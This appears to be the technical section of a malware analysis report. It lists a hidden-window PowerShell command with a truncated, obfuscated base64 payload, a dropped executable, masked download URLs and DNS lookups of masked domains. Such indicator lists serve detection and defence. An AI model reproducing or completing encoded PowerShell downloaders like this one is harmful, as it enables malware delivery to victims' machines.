Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABPAEIAUgBFAEwAegBxAG8APQAnAFAARwBTAEoAWQBlAGoAZgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAYABDAHUAUgBpAGAAVABgAFkAYABQAFIAYABPAHQATwBjAE8ATAAiAC...
- %HOMEPATH%\858.exe
- http://mi###ocha2u.com/ehlmy/LHZQclWq/
- http://bl###ingbow.com/temp/pVFQL089825/
- DNS ASK mi###ocha2u.com
- DNS ASK pn##a.com
- DNS ASK bl###ingbow.com
- DNS ASK go#####kstoneshop.com
- DNS ASK ne###ick4u.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABPAEIAUgBFAEwAegBxAG8APQAnAFAARwBTAEoAWQBlAGoAZgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAYABDAHUAUgBpAGAAVABgAFkAYABQAFIAYABPAHQATwBjAE8ATAAiAC...' (with hidden window)